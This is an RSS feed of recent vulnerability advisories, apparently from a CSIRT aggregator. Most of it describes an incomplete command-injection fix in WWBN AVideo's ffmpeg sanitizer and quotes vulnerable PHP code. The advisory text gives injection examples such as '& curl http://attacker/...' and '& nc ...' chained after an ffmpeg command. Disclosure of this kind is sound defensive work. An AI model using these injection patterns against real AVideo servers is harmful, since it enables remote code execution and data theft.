<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 10 Oct 2026 13:07:15 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-338451</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-338451</link>
      <description>EUVD-2026-338451</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-338451</guid>
    </item>
    <item>
      <title>fkie_cve-2026-55173</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-55173</link>
      <description>&lt;p&gt;WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single &amp;amp; ( the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) failed to strip $(...) command substitution, allowing OS command injection at the execAsync() sh -c sink. The fix (commit 25c8ab90) added $, (, ), {, }, \n, \r to the denylist character class and a str_replace(&amp;#39;&amp;amp;&amp;amp;&amp;#39;, &amp;#39;&amp;#39;, ...), but did not account for the single &amp;amp;. ffmpeg.json.php builds the command from _decryptString(getInput(&amp;#39;codeToExecEncrypted&amp;#39;)). This is the same threat model the original advisory accepted (“an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server”) and the same CVSS basis (AV:N/AC:H/PR:N). Multiple &amp;amp;-separated commands can be chained (e.g. download + execute). Redirect-based payloads are blocked by the &amp;gt; strip, but command execution (e.g. &amp;amp; curl http://attacker/..., &amp;amp; nc ..., dropping/running a file) is not. This issue has been patched by this commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single &amp;amp; ( the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) failed to strip $(...) command substitution, allowing OS command injection at the execAsync() sh -c sink. The fix (commit 25c8ab90) added $, (, ), {, }, \n, \r to the denylist character class and a str_replace(&amp;#39;&amp;amp;&amp;amp;&amp;#39;, &amp;#39;&amp;#39;, ...), but did not account for the single &amp;amp;. ffmpeg.json.php builds the command from _decryptString(getInput(&amp;#39;codeToExecEncrypted&amp;#39;)). This is the same threat model the original advisory accepted (“an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server”) and the same CVSS basis (AV:N/AC:H/PR:N). Multiple &amp;amp;-separated commands can be chained (e.g. download + execute). Redirect-based payloads are blocked by the &amp;gt; strip, but command execution (e.g. &amp;amp; curl http://attacker/..., &amp;amp; nc ..., dropping/running a file) is not. This issue has been patched by this commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-55173</guid>
    </item>
    <item>
      <title>GHSA-wc3f-xc32-435f — AVideo has an incomplete fix of CVE-2026-33482: sanitizeFFmpegCommand still allows a single '&amp;' (background operator),…</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-wc3f-xc32-435f</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Packagist: wwbn/avideo&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;The fix for CVE-2026-33482 (GHSA-pmj8-r2j7-xg6c) is incomplete. That advisory reported that `sanitizeFFmpegCommand()` (`plugin/API/standAlone/functions.php`) failed to strip `$(...)` command substitution, allowing OS command injection at the `execAsync()` `sh -c` sink. The fix (commit `25c8ab90`) added `$`, `(`, `)`, `{`, `}`, `\n`, `\r` to the denylist character class and a `str_replace(&amp;#39;&amp;amp;&amp;amp;&amp;#39;, &amp;#39;&amp;#39;, ...)`. It still does **not** neutralize a single `&amp;amp;` (the shell background operator), which remains a command separator at the unchanged sink. Same entry point, same sink, same impact as the original — only the surviving metacharacter differs.&lt;/p&gt;
&lt;p&gt;Verified at master HEAD.&lt;/p&gt;
&lt;p&gt;### The surviving gap&lt;/p&gt;
&lt;p&gt;HEAD `sanitizeFFmpegCommand` (`functions.php`):
```php
$command = str_replace(&amp;#39;&amp;amp;&amp;amp;&amp;#39;, &amp;#39;&amp;#39;, $command);                    // only the doubled form
$command = preg_replace(&amp;#39;/\s*&amp;amp;?&amp;gt;.*(?:2&amp;gt;&amp;amp;1)?/&amp;#39;, &amp;#39;&amp;#39;, $command);  // strips &amp;#39;&amp;amp;&amp;#39; only when followed by &amp;#39;&amp;gt;&amp;#39;
$command = preg_replace(&amp;#39;/[;|`&amp;lt;&amp;gt;$()\n\r{}]/&amp;#39;, &amp;#39;&amp;#39;, $command);   // char class has no &amp;#39;&amp;amp;&amp;#39;
// then requires the result to start with &amp;#39;ffmpeg&amp;#39;
```
A single `&amp;amp;` is therefore preserved. `ffmpeg ... &amp;amp; &amp;lt;cmd&amp;gt;` passes the sanitizer and the `strpos(trim($command),&amp;#39;ffmpeg&amp;#39;)===0` prefix gate.&lt;/p&gt;
&lt;p&gt;### Sink (unchanged)&lt;/p&gt;
&lt;p&gt;`plugin/API/standAlone/ffmpeg.json.php:418` -&amp;gt; `execAsync($ffmpegCommand, $keyword)`. In `objects/functionsExec.php::execAsync`:
```php
$command = addcslashes($command, &amp;#39;&amp;#34;&amp;#39;);   // line 686 — escapes only the double-quote
$commandWithKeyword…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Packagist: wwbn/avideo&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;The fix for CVE-2026-33482 (GHSA-pmj8-r2j7-xg6c) is incomplete. That advisory reported that `sanitizeFFmpegCommand()` (`plugin/API/standAlone/functions.php`) failed to strip `$(...)` command substitution, allowing OS command injection at the `execAsync()` `sh -c` sink. The fix (commit `25c8ab90`) added `$`, `(`, `)`, `{`, `}`, `\n`, `\r` to the denylist character class and a `str_replace(&amp;#39;&amp;amp;&amp;amp;&amp;#39;, &amp;#39;&amp;#39;, ...)`. It still does **not** neutralize a single `&amp;amp;` (the shell background operator), which remains a command separator at the unchanged sink. Same entry point, same sink, same impact as the original — only the surviving metacharacter differs.&lt;/p&gt;
&lt;p&gt;Verified at master HEAD.&lt;/p&gt;
&lt;p&gt;### The surviving gap&lt;/p&gt;
&lt;p&gt;HEAD `sanitizeFFmpegCommand` (`functions.php`):
```php
$command = str_replace(&amp;#39;&amp;amp;&amp;amp;&amp;#39;, &amp;#39;&amp;#39;, $command);                    // only the doubled form
$command = preg_replace(&amp;#39;/\s*&amp;amp;?&amp;gt;.*(?:2&amp;gt;&amp;amp;1)?/&amp;#39;, &amp;#39;&amp;#39;, $command);  // strips &amp;#39;&amp;amp;&amp;#39; only when followed by &amp;#39;&amp;gt;&amp;#39;
$command = preg_replace(&amp;#39;/[;|`&amp;lt;&amp;gt;$()\n\r{}]/&amp;#39;, &amp;#39;&amp;#39;, $command);   // char class has no &amp;#39;&amp;amp;&amp;#39;
// then requires the result to start with &amp;#39;ffmpeg&amp;#39;
```
A single `&amp;amp;` is therefore preserved. `ffmpeg ... &amp;amp; &amp;lt;cmd&amp;gt;` passes the sanitizer and the `strpos(trim($command),&amp;#39;ffmpeg&amp;#39;)===0` prefix gate.&lt;/p&gt;
&lt;p&gt;### Sink (unchanged)&lt;/p&gt;
&lt;p&gt;`plugin/API/standAlone/ffmpeg.json.php:418` -&amp;gt; `execAsync($ffmpegCommand, $keyword)`. In `objects/functionsExec.php::execAsync`:
```php
$command = addcslashes($command, &amp;#39;&amp;#34;&amp;#39;);   // line 686 — escapes only the double-quote
$commandWithKeyword…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-wc3f-xc32-435f</guid>
    </item>
  </channel>
</rss>
